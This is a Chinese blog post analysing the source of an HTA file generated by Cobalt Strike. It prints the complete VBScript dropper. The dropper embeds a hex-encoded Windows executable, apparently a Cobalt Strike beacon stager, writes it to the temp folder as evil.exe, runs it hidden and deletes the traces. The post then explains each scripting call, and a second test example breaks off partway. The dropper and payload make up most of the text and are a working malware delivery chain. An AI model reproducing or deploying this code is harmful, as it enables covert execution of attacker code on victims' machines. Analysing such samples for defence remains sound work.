cs生成hta文件源码解析

于 2023-11-17 21:38:40 发布
阅读量419 收藏
点赞数 5
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53665691/article/details/134460846
版权

自定义目录标题

一.cs 生成hta文件源码

CobaltStrike 生成 hta execute 的 evil.hta ,源码如下:


<script language="VBScript">
	Function var_func()
	    // 可执行程序十六进制值
		var_shellcode = "4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c010700000000000000000000000000e0000f030b010222001c00000036000000060000a0140000001000000030000000004000001000000002000004000000010000000400000000000000009000000004000021c40000020000000000200000100000000010000010000000000000100000000000000000000000006000004406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003040000018000000000000000000000000000000000000001c610000e00000000000000000000000000000000000000000000000000000002e74657874000000441a000000100000001c000000040000000000000000000000000000600050602e646174610000006c040000003000000006000000200000000000000000000000000000400060c02e7264617461000034060000004000000008000000260000000000000000000000000000400030402e6273730000000028040000005000000000000000000000000000000000000000000000800060c02e69646174610000440600000060000000080000002e0000000000000000000000000000400030c02e4352540000000034000000007000000002000000360000000000000000000000000000400030c02e746c730000000008000000008000000002000000380000000000000000000000000000400030c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c38db426000000008db426000000009083ec1c31c066813d000040004d5ac7058c53400001000000c7058853400001000000c7058453400001000000c705285040000100000075188b153c00400081ba00004000504500008d8a000040007450a30c504000a19453400085c07532c7042401000000e812190000e8151900008b15a85340008910e804090000833d5434400001744b31c083c41cc38d74260090c7042402000000e8e0180000ebcc66900fb751186681fa0b01743d6681fa0b02759e83b9840000000e76958b91f800000031c085d20f95c0eb868db600000000c70424f01b4000e81410000031c083c41cc38db6000000008379740e0f865effffff8b89e800000031c085c90f95c0e94cffffff8db426000000008d7426009083ec2ca180534000c744241004504000a304504000a124504000c7442408145040008944240cc744240418504000c704241c504000e84a18000083c42cc366908d4c240483e4f031c0ff71fc5589e557568d55a45389d751b91100000083ec788b3594534000f3ab85f60f85a002000064a1180000008b35706140008b780431dbeb198d7426009039c70f8418020000c70424e8030000ffd683ec0489d8f00fb13d2054400085c075dea12454400031db83f8010f8401020000a12454400085c00f8479020000c7050850400001000000a12454400083f8010f84f601000085db0f8414020000a12c40400085c0741cc744240800000000c744240402000000c7042400000000ffd083ec0ce8ef0b0000c7042410214000ff156c61400083ec04a3ac534000c7042400104000e87e170000e8190a0000c705dc53400000004000e83617000031c98b0085c07513eb4d84d2744483e1017427b90100000083c0010fb61080fa207ee789cb83f30180fa220f44cbebe88db426000000008d760084d274148d7426000fb6500183c00184d2740580fa207ef0a3d85340008b1d9453400085db7414b80a000000f645d0010f85e2000000a3003040008b1d1c5040008d349d04000000893424e83c1600008b151850400089459085db0f8e8201000089c38d46fc89d789458c01d08945948b0783c30483c704890424e8ec1500008d7001893424e8011600008943fc8b4ffc89742408894c2404890424e8e3150000397d9475ca8b458c034590c700000000008b4590a318504000e801060000a1145040008b1598614000890289442408a11850400089442404a11c504000890424e85a1600008b0d0c504000a31050400085c90f84f20000008b150850400085d20f84a10000008d65f0595b5e5f5d8d61fcc38d742600900fb745d4e915ffffff8db42600000000a124544000bb0100000083f8010f85fffdffffc704241f000000e895150000a12454400083f8010f850afeffffc744240408704000c7042400704000e863150000c705245440000200000085db0f85ecfdffff871d20544000e9e1fdffff8db426000000008d7600891424ff155061400083ec04e94ffdffff8db42600000000e827150000a1105040008d65f0595b5e5f5d8d61fcc36690c744240418704000c704240c704000c7052454400001000000e8ee140000e96efdffff8b4590e9c1feffff890424e8b91400008db426000000008db60000000083ec0cc7059453400001000000e8ee04000083c40ce9a6fcffff8db60000000083ec0cc7059453400000000000e8ce04000083c40ce986fcffff8db60000000083ec1c8b442420890424e87514000085c00f94c083c41c0fb6c0f7d8c39090905589e583ec18c7042420154000e8ceffffffc9c38db426000000008d74260090c39090909090909090909090909090905589e58b45085dffe0558b152c30400089e58b450885d27e21833d30304000007e188b0d48614000890c108b0d4c6140008b1530304000890c105dc35589e5565383ec308b5d0cc744240c04000000c744240800300000895c2404c7042400000000ff158061400089c683ec1031c039d87d178b4d1089c283e2038a14118b4d0832140188140640ebe5893424e877ffffff8d45f4893424895c24048944240cc744240820000000ff158461400083ec108974240cc744241400000000c744241000000000c744240830154000c744240400000000c7042400000000ff152c61400083ec188d65f85b5e5dc35589e557565383ec3c8b7d088b750cc745e400000000c744241c00000000c744241800000000c744241400000000c744241000000000c744240c01000000c744240800000000c744240402000000c70424e0534000ff152861400089c34883ec2083f8fd7757c744240400000000891c24ff1520614000525285c0744085f67e278d45e4c7442410000000008944240c89742408897c2404891c24ff158c61400083ec1485c0750c891c24ff151c61400050eb098b45e401c729c6ebc08d65f45b5e5f5dc35589e583ec18a124304000c704243430400089442404e820ffffff31c0c9c35589e557565383ec3c8b7d088b750cc745e400000000c744241800000000c744241480000000c744241003000000c744240c00000000c744240803000000c744240400000080c70424e0534000ff152461400089c383ec1c31c083fbff744585f67e278d45e4c7442410000000008944240c89742408897c2404891c24ff156861400083ec1485c07511891c24ff151c61400050b801000000eb098b45e401c729c6ebbb8d65f45b5e5f5dc35589e55383ec14a124304000890424e86c11000089c3c7042400040000ff157061400050a124304000891c2489442404e81fffffff85c074dda124304000891c24c74424082830400089442404e86efdffff8b5dfc31c0c9c35589e583ec38ff1558614000b9aa26000031d2c74424285c000000f7f1c744242465000000c744242070000000c744241c69000000c744241870000000c74424145c000000c74424102e000000c744240c5c000000c74424085c000000c744240400404000c70424e05340008954242ce89a100000c744241400000000c744241000000000c744240c00000000c7442408e1164000c744240400000000c7042400000000ff152c614000c745080000000083ec18c9e9edfeffff90a1403440008b0085c0742583ec0c6690ffd0a1403440008d50048b400489154034400085c075e983c40cc38d74260090c38db426000000008db42600000000905383ec188b1d302a400083fbff742985db74118d74260090ff149d302a400083eb0175f4c70424c0184000e8b0fbffff83c4185bc38d760031c08db60000000089c383c0018b1485302a400085d275f0ebbd8db426000000008db42600000000a12050400085c07407c38db600000000c7052050400001000000eb8490909090ff259c6140009090909090909090909031c0c3909090909090909090909090905557565383ec2ca164344000c744241000000000c7442414000000003d4ee640bb7415f7d0a36834400083c42c5b5e5f5dc38db6000000008d442410890424ff155461400083ec048b5c2410335c2414ff153c61400089c5ff154061400089c7ff155861400089c68d442418890424ff156461400083ec048b44241831d83344241c31e831f831f03d4ee640bb742189c2f7d2a36434400089156834400083c42c5b5e5f5dc38db426000000008d7600bab019bf44b84fe640bbebd78d7426005589e583ec28c70520534000090400c08b45048d5504c7052453400001000000891504514000a3f8504000a32c5340008b4508c7042400000000a3ec504000a1643440008945f0a1683440008945f4ff156c61400083ec04c7042424404000ff157c61400083ec04ff1538614000c7442404090400c0890424ff157461400083ec08e8750e000090909090909090909083ec1c8b44242483f803741485c07410b80100000083c41cc20c008d74260090894424048b5424288b44242089542408890424e818090000b80100000083c41cc20c008db426000000008db600000000565383ec14833d50344000028b442424740ac705503440000200000083f802741783f801744a83c414b8010000005b5ec20c008d74260090bb30704000be3070400039de74e08db426000000008d76008b0385c07402ffd083c30439de75f183c414b8010000005b5ec20c008d7426008b442428c744240401000000894424088b442420890424e87408000083c414b8010000005b5ec20c008db4260000000031c0c3909090909090909090909090905653bb4840400083ec548b4424608b088d51ff83fa0577078b1c9564414000dd40188b7004dd5c2448dd4010dd5c2440dd4008c7042402000000dd5c2438e87d0d0000dd4424488974240c895c2408c744240458404000dd5c2420dd442440890424dd5c2418dd442438dd5c2410e8e10c000083c45431c05b5ec39090909090dbe3c3909090909090909090909090905383ec18c70424020000008d5c2424e81c0d0000c74424081b0000008944240cc744240401000000c704247c414000e8800c0000c7042402000000e8f00c00008b542420895c240889042489542404e8280c0000e8830c00008db4260000000057565389c383ec308b359c53400085f60f8eea000000a1a053400031c983c00c8b1039da770a8b780403570839d3727f83c10183c01439f175e6891c24e82e09000089c785c00f84db000000a1a05340008d1cb6c1e30201d8897810c70000000000e8190a00008b15a053400003470c89441a0c8d542414c74424081c00000089542404890424ff158861400083ec0c85c074738b4424288d50c083e2bf740883e80483e0fb750e83059c5340000183c4305b5e5fc38b4424148b542420031da0534000894304895308895c240cc74424084000000089542404890424ff158461400083ec1085c075beff1544614000c70424ec41400089442404e8a0feffff31f6e933ffffffa1a05340008b44180c894424088b4708c70424b841400089442404e879feffff895c2404c7042498414000e869feffff8db4260000000066905589e557565383ec3ca1985340008945cc85c0740b8d65f45b5e5f5dc38d7600c7059853400001000000e8810800008d04808d04851b000000c1e804c1e004e86c0a0000c7059c5340000000000029c48d44241f83e0f0a3a0534000b8344640002d3446400083f8077eaa8b153446400083f80b0f8f96000000bb3446400085d20f858e0100008b430485c00f85830100008b430883f8010f85c40100008d7b0c81ff344640007226e967ffffff66902b45d4030389c689d8e802feffff893383c70c81ff344640000f83b10000008b078b4f040fb657088db0000040008d99000040008b80000040008975d483fa10744e83fa2074b983fa080f84e000000089542404c7042448424000e850fdffff85d20f85f8000000a13846400089c70b3d3c4640000f852d0100008b1540464000bb40464000e944ffffff8d742600900fb7b100004000894dd089f181c90000ffff6685f60f48f12b75d483c70c01c689d8e859fdffff8b4dd06689b10000400081ff344640000f8252ffffff8d7600a19c53400085c00f8e88feffff8b1d846140008b7dcc8d75e48db426000000008b15a05340008d04bf8d04828b1085d2741a8974240c895424088b5008895424048b4004890424ffd383ec1083c7013b3d9c5340007cc98d65f45b5e5f5dc3900fb61389d681ce00ffffff84d20f48d62b55d48d340289d8e8c3fcffff89f08803e9bafeffff8db426000000008d7600bb3446400081fb344640000f83f4fdffff8db426000000008b73048b3b83c30803be000040008d8600004000e87ffcffff89be0000400081fb3446400072d9e92cffffff8d742600bb34464000e928feffff89442404c7042414424000e8eefbffff909090909090909090909090909083ec3ca1a4534000dd442448dd442450dd44245885c07430d9ca8b542440dd5c2418dd5c2420895424108b542444dd5c2428895424148d542410891424ffd0eb0d8db42600000000ddd8ddd8ddd883c43cc38db426000000008db426000000008b442404a3a4534000e97608000090905383ec188b5c24208b038b003d930000c0741d775b3d1d0000c00f84db0000000f868a0000000573ffff3f83f8047725c744240400000000c7042408000000e8c807000083f8010f84f300000085c00f850b010000a1ac53400085c00f84ce000000895c242083c4185bffe08d7426003d940000c07579c744240400000000c7042408000000e88107000083f80175bdc744240401000000c7042408000000e868070000b8ffffffffe98400000066903d050000c0759ec744240400000000c704240b000000e84107000083f8010f849c00000085c00f8479ffffffc704240b000000ffd0b8ffffffffeb468d7426003d960000c00f855affffffc744240400000000c7042404000000e8fd06000083f801747585c00f8439ffffffc7042404000000ffd0b8ffffffffeb068d74260031c083c4185bc204008db42600000000c744240401000000c7042408000000e8b8060000e807faffffb8ffffffffebd2c7042408000000ffd0b8ffffffffebc2c744240401000000c704240b000000e88806000083c8ffeba9c744240401000000c7042404000000e86f06000083c8ffeb9090909090909090909090909090905557565383ec1cc70424b8534000ff15346140008b1db053400083ec0485db74348b2d786140008b3d446140008d76008b03890424ffd583ec0489c6ffd785c0750c85f674088b4304893424ffd08b5b0885db75dbc70424b8534000ff156061400083ec0483c41c5b5e5f5dc38d7600a1b453400085c07507c38db6000000005383ec18c74424040c000000c7042401000000e8fc05000089c385c074428b442420c70424b853400089038b442424894304ff1534614000a1b0534000891db053400083ec04894308c70424b8534000ff156061400031c083ec0483c4185bc383c8ffebf68db426000000008d7426005383ec18a1b45340008b5c242085c0750f83c41831c05bc38db4260000000090c70424b8534000ff1534614000a1b053400083ec0485c0742731c9eb0b8d760089c185d2741a89d08b1039da8b500875ef85c9742b895108890424e82c050000c70424b8534000ff156061400031c083ec0483c4185bc38db4260000000066908915b0534000ebd08db42600000000905383ec188b44242483f8020f84bf000000772585c07451a1b453400085c07430c705b45340000100000083c418b8010000005bc38d74260083f80375eda1b453400085c074e4e835feffffebdd8d7600c70424b8534000ff155c61400083ec04ebbe8db600000000a1b453400085c07405e80afeffffa1b453400083f80175aa8b1db053400085db74178db60000000089d88b5b08890424e85f04000085db75efc705b053400000000000c705b453400000000000c70424b8534000ff153061400083ec04e960ffffff8db600000000e85bf7ffff83c418b8010000005bc39003403c8138504500007515668178180b010f94c00fb6c0c38db426000000009031c0c38db426000000008db6000000008b4424046681384d5a7505ebc38d760031c0c38db426000000008db60000000056538b54240c8b5c241003523c0fb742140fb772068d44021885f6741b31c9908b500c39da770703500839da770c83c10183c02839f175e831c05b5ec38d76005557565331db83ec1c8b7c2430893c24e84703000083f808776066813d000040004d5a7555b800004000e841ffffff85c07447a13c0040000fb790140040000fb7a8060040008d9c101800400085ed743731f6eb0d8d760083c60183c32839ee7426c744240808000000897c2404891c24e8de02000085c075de83c41c89d85b5e5f5dc38d74260083c41c31db89d85b5e5f5dc38db426000000008d7426009031d266813d000040004d5a756356b80000400053e8b7feffff85c0744da13c0040008b5c240c0fb790140040000fb7b00600400081eb000040008d94101800400085f6742331c98db4260000000066908b420c39c3720703420839c3720c83c10183c22839f175e831d289d05b5ec39089d0c38db426000000008db60000000031c066813d000040004d5a751ab800004000e839feffff85c0740ca13c0040000fb78006004000c38db426000000009031d2538b4c240866813d000040004d5a7547b800004000e804feffff85c07439a13c0040000fb790140040000fb798060040008d94101800400085db741931c0f6422720740785c9740f83e90183c00183c22839d875e931d289d05bc38d760031d266813d000040004d5a7514b800004000e8a9fdffff85c0b8000040000f45d089d0c38db426000000008d7426009031c066813d000040004d5a756356b80000400053e877fdffff85c0744d8b153c0040008b5c240c0fb782140040000fb7b20600400081eb000040008d84021800400085f6742231c98db42600000000908b500c39d3720703500839d3721a83c10183c02839f175e831c05b5ec38d7600c38db426000000008b40245b5ef7d0c1e81fc38db426000000008db60000000031c95766813d000040004d5a56538b5c24107556b800004000e8e2fcffff85c07448a13c0040008db0000040008b808000400085c074330fb756140fb77e068d54161885ff742331f68db426000000008b4a0c39c87207034a0839c8721283c60183c22839fe75e831c95b89c85e5fc30500004000eb0f8db42600000000669083eb0183c0148b480485c975078b500c85d274d485db7fe88b480c5b5e5f81c10000400089c8c390909090909090909051503d001000008d4c240c721581e9001000008309002d001000003d0010000077eb29c18309005859c39090ff25f46140009090ff25f06140009090ff25ec6140009090ff25e86140009090ff25e46140009090ff25e06140009090ff25dc6140009090ff25d86140009090ff25d46140009090ff25d06140009090ff25cc6140009090ff25c86140009090ff25c46140009090ff25c06140009090ff25b86140009090ff25b46140009090ff25b06140009090ff25ac6140009090ff25a86140009090ff25a46140009090ff25a06140009090ff25946140009090669066908b442404c1e0050305bc614000c39090a1d4534000c38db426000000008d76008b4424048705d4534000c390909090908d4c240483e4f0ff71fc5589e55183ec14e86aefffffc7042400000000e803eeffffc7042410270000ff157061400050ebf09090669066906690669066906690e9dbeaffff9090909090909090909090ffffffff202a400000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000000000000000000000000000000000000000030200000200300008ef3a8de0000000000000000721b21de8ef3c8576bc27aba05a19855dcff238c9a78daf68144e2f8bf0c991e22cfc9a28cdf881f41fea9196c03fa8905a1b855cccfa90e05b3d05b4e87e2df5ea323969678f0fe8f204be2c7789c558f259921bf33041f41fea919b613dd2a8d8e50e5f3d7dd3cd678f0fa8f20ce5582b8238692f27b558a78a90e07b78cfad5a8c987d4a2573ed6acf2559c182e83e69dcdaa8e9bdfb7e09afcb6c2848ed971269921d9a4ff89d99b9288f754570b6777a8de8ea89917dfa2c2dddfa2c0368df3a88dde9bff571135570b6583f3ef5ca1c0de8cb32c8cdca1fb8cde9b438ba0c8570b07352b1ddec25789d999578dd89b85d89688570b0b33a75a4df2a8debf0c2d28faf7212765fac0744b11f5215b7a69b6cbd2f6ef71269921d999af8fd8a3c069d913a3215b4ca8f18ef39119fa4499216762a9de8e1a61df8ef34055710c57f1d8a9ca948eabde640105abba436abf33c081f0b983c37ff01164d74d9be1adb66f9b3c648cd9e21a9f4ea5a872f0450b5ba7a8d0c98c2d825f2ad15cc3999312aed42ac240f288d99a4c9de4ba48a88bfd96daf3cf94cdb0fac98893e189c1b2e29287eba0c388f6ed9cc5aeef87c1bce29693fec3a0e19baeca86eeb5d3ffb7e097c7a9fdd3e68aaec586efb5d3ff91d9c59ce5aea7dab7ea96c6aaa1c686eeb5d3ea91c7b691e5dda5fb9ba7fea2dea20a0d5d4436c89b4367f7321bd60e1842e2bc9175d9779f280ad99fcafc94f8605e34760915022a816dcce4247e4831f22019d639af61f3e1e7881341d3709a193724477e88c217062c895adefecb5a00913d9220f027d977de7c028bd8854d46010347ad91a3ef195bd2555f7faeef978724efde1b1154650d702884002920d1b4f7eead1367e70ce7792980ef10069a55fb75be7add64044e4c22a1028d9bf08a3bc549bb962e24a8ca905afd272dec42fe48d8b15b51e2310581be211917a401d868f4f1aeef465e2176a9c6a8b67e460a887126c29ee6f3b8de8e9ba8decef3ffb6d657fb3b71263b678ef3a8de8f2af98d0714ffb68ed3a8dedda5c0cc187a4a215b7668aa4878afdf4d7668ab6bab6b36270e5721bfca9af0bfc590f0bfc19ef0bfc191de99a3cd344141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141410000000000000000000000000000000000000000000000000000000000000000402a4000ffffffffffffffffff00000002000000ffffffffb0294000c0294000d02940004ee640bbb119bf4400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002563256325632563256325632563256325634d5353452d25642d736572766572000000002053400040504000401b4000008040000480400090534000207040000000000000000000556e6b6e6f776e206572726f720000005f6d61746865727228293a20257320696e2025732825672c2025672920202872657476616c3d2567290a0000417267756d656e7420646f6d61696e206572726f722028444f4d41494e2900417267756d656e742073696e67756c617269747920285349474e2900004f766572666c6f772072616e6765206572726f7220284f564552464c4f57290054686520726573756c7420697320746f6f20736d616c6c20746f20626520726570726573656e7465642028554e444552464c4f5729000000546f74616c206c6f7373206f66207369676e69666963616e63652028544c4f53532900005061727469616c206c6f7373206f66207369676e69666963616e63652028504c4f5353290000000084404000a3404000c0404000e0404000184140003c4140004d696e67772d7736342072756e74696d65206661696c7572653a0a004164647265737320257020686173206e6f20696d6167652d73656374696f6e0020205669727475616c5175657279206661696c656420666f7220256420627974657320617420616464726573732025700000000020205669727475616c50726f74656374206661696c6564207769746820636f6465203078257800002020556e6b6e6f776e2070736575646f2072656c6f636174696f6e2070726f746f636f6c2076657273696f6e2025642e0a0000002020556e6b6e6f776e2070736575646f2072656c6f636174696f6e206269742073697a652025642e0a0000004743433a2028474e552920392e322d77696e33322032303139313030380000004743433a2028474e552920392e332d77696e33322032303230303332300000004743433a2028474e552920392e332d77696e33322032303230303332300000004743433a2028474e552920392e332d77696e33322032303230303332300000004743433a2028474e552920392e332d77696e33322032303230303332300000004743433a2028474e552920392e322d77696e33322032303139313030380000004743433a2028474e552920392e322d77696e33322032303139313030380000004743433a2028474e552920392e322d77696e33322032303139313030380000004743433a2028474e552920392e322d77696e33322032303139313030380000004743433a2028474e552920392e322d77696e33322032303139313030380000004743433a2028474e552920392e322d77696e33322032303139313030380000004743433a2028474e552920392e322d77696e33322032303139313030380000004743433a2028474e552920392e322d77696e33322032303139313030380000004743433a2028474e552920392e322d77696e33322032303139313030380000004743433a2028474e552920392e322d77696e33322032303139313030380000004743433a2028474e552920392e322d77696e33322032303139313030380000004743433a2028474e552920392e322d77696e33322032303139313030380000004743433a2028474e552920392e322d77696e33322032303139313030380000004743433a2028474e552920392e322d77696e33322032303139313030380000004743433a2028474e552920392e322d77696e33322032303139313030380000004743433a2028474e552920392e322d77696e33322032303139313030380000004743433a2028474e552920392e322d77696e33322032303139313030380000004743433a2028474e552920392e322d77696e33322032303139313030380000004743433a2028474e552920392e322d77696e33322032303139313030380000004743433a2028474e552920392e322d77696e33322032303139313030380000004743433a2028474e552920392e332d77696e33322032303230303332300000004743433a2028474e552920392e322d77696e33322032303139313030380000004743433a2028474e552920392e322d77696e33322032303139313030380000004743433a2028474e552920392e322d77696e33322032303139313030380000004743433a2028474e552920392e332d77696e3332203230323030333230000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003c6000000000000000000000c46500001c610000b4600000000000000000000038660000946100000000000000000000000000000000000000000000fc6100000a6200001e6200002c6200004062000050620000686200008062000094620000aa620000c0620000d0620000e4620000f66200000863000022630000326300004e63000066630000806300008c630000aa630000b2630000c6630000d4630000f0630000006400001264000022640000000000002e6400003e6400004a6400005a6400006864000076640000886400009c640000aa640000b4640000c0640000c8640000d2640000da640000e4640000ec640000f6640000fe64000008650000126500001c65000026650000306500003a6500004465000000000000fc6100000a6200001e6200002c6200004062000050620000686200008062000094620000aa620000c0620000d0620000e4620000f66200000863000022630000326300004e63000066630000806300008c630000aa630000b2630000c6630000d4630000f0630000006400001264000022640000000000002e6400003e6400004a6400005a6400006864000076640000886400009c640000aa640000b4640000c0640000c8640000d2640000da640000e4640000ec640000f6640000fe64000008650000126500001c65000026650000306500003a65000044650000000000008800436c6f736548616e646c65009e00436f6e6e6563744e616d6564506970650000c70043726561746546696c654100df004372656174654e616d656450697065410000f7004372656174655468726561640000150144656c657465437269746963616c53656374696f6e003601456e746572437269746963616c53656374696f6e00001f0247657443757272656e7450726f6365737300200247657443757272656e7450726f63657373496400240247657443757272656e745468726561644964000069024765744c6173744572726f7200007d024765744d6f64756c6548616e646c65410000b60247657450726f63416464726573730000d90247657453746172747570496e666f4100f30247657453797374656d54696d65417346696c6554696d650012034765745469636b436f756e7400006d03496e697469616c697a65437269746963616c53656374696f6e00cd034c65617665437269746963616c53656374696f6e00005e045175657279506572666f726d616e6365436f756e7465720085045265616446696c6500005a05536574556e68616e646c6564457863657074696f6e46696c746572006a05536c6565700079055465726d696e61746550726f6365737300008d05546c7347657456616c7565009b05556e68616e646c6564457863657074696f6e46696c7465720000b4055669727475616c416c6c6f630000bd055669727475616c50726f746563740000c0055669727475616c517565727900000606577269746546696c65003a005f5f6765746d61696e61726773003b005f5f696e6974656e760044005f5f6c636f6e765f696e697400004c005f5f705f5f61636d646c6e0053005f5f705f5f666d6f6465000068005f5f7365745f6170705f7479706500006b005f5f736574757365726d61746865727200008e005f616d73675f6578697400009f005f636578697400002f015f696e69747465726d0033015f696f62000039025f6f6e65786974009a0361626f727400a70363616c6c6f630000b103657869740000c103667072696e746600c803667265650000d403667772697465000000046d616c6c6f63000008046d656d637079000023047369676e616c00002604737072696e74660035047374726c656e000038047374726e636d7000570476667072696e7466000000600000006000000060000000600000006000000060000000600000006000000060000000600000006000000060000000600000006000000060000000600000006000000060000000600000006000000060000000600000006000000060000000600000006000000060000000600000006000004b45524e454c33322e646c6c00000000146000001460000014600000146000001460000014600000146000001460000014600000146000001460000014600000146000001460000014600000146000001460000014600000146000001460000014600000146000001460000014600000146000006d73766372742e646c6c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020114000000000000000000010104000801940000000000000000000401b4000f01a4000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"

		Dim var_obj
		Set var_obj = CreateObject("Scripting.FileSystemObject")   // 创建制定类型的对象
		Dim var_stream
		Dim var_tempdir
		Dim var_tempexe
		Dim var_basedir
		Set var_tempdir = var_obj.GetSpecialFolder(2)   //
		var_basedir = var_tempdir & "\" & var_obj.GetTempName()
		var_obj.CreateFolder(var_basedir)
		var_tempexe = var_basedir & "\" & "evil.exe"
		Set var_stream = var_obj.CreateTextFile(var_tempexe, true , false)      // 
		For i = 1 to Len(var_shellcode) Step 2
		    var_stream.Write Chr(CLng("&H" & Mid(var_shellcode,i,2)))
		Next
		var_stream.Close
		Dim var_shell
		Set var_shell = CreateObject("Wscript.Shell")
		var_shell.run var_tempexe, 0, true
		var_obj.DeleteFile(var_tempexe)
		var_obj.DeleteFolder(var_basedir)
	End Function

	var_func
	self.close
</script>

二.源码解析


var_shellcode:可执行程序十六进制值

CreateObject(servername.typename[,location])
servername 必需的。提供对象的应用程序的名称
typename 必需的。对象的类型/类
location 可选的。在何处创建对象

FileSystemObject 文件系统对象,提供对计算机文件系统的访问;对象方法:


GetSpecialFolder:返回某些 Windows 特殊文件夹的路径。
GetSpecialFolder(2):返回tmp临时文件夹路径
GetTempName:返回随机生成的临时文件或文件夹。
CreateFolder:创建新文件夹。
CreateTextFile:创建一个文本文件并返回一个可用于读取或写入文件的 TextStream 对象。
DeleteFile:删除一个或多个指定文件。
DeleteFolder:删除一个或多个指定的文件夹。

CreateTextFile 创建制定的文件名并返回可用于读取或写入文件的TextStream对象。


语法:object.CreateTextFile (filename, [ overwrite, [ unicode ]])
object:必填。始终是文件系统对象或文件夹对象的名称。
filename:必填。标识要创建的文件的字符串表达式。
overwrite:自选。指示是否可以覆盖现有文件的布尔值。如果可以覆盖文件,则值为True;如果无法覆盖,
则为 false。如果省略,则可以覆盖现有文件。
unicode:自选。指示文件是创建为 Unicode 文件还是 ASCII 文件的布尔值。如果将文件创建为
Unicode 文件,则值为True;如果它是作为 ASCII 文件创建的,则为 False。如果省略,则假定为
ASCII 文件。

TextStream 对象


wirte方法:将指定文本写入 TextStream 文件。

类型转换函数

CLng:将一种数据类型转换为另一种数据类型。-2,147,483,6482,147,483,647;分数是四舍五入
的。


Wscript.Shell // 提供对系统 Shell 方法的访问。
Chr 函数 // 将ANSI 值转换为字符串
Mid 函数 // 返回一个Variant(字符串),其中包含字符串中制定数量的字符

三.实例

测试实例


<!DOCTYPE html>
<html>
<head>
<script type="text/vbscript">
	var_shellcode = "4d5a90000300000004000000ffff"
	Dim var_obj
	Set var_obj = CreateObject("Scripting.FileSystemObject")
	Dim var_stream
	Dim var_tempdir
	Dim var_tempexe
	Dim var_basedir
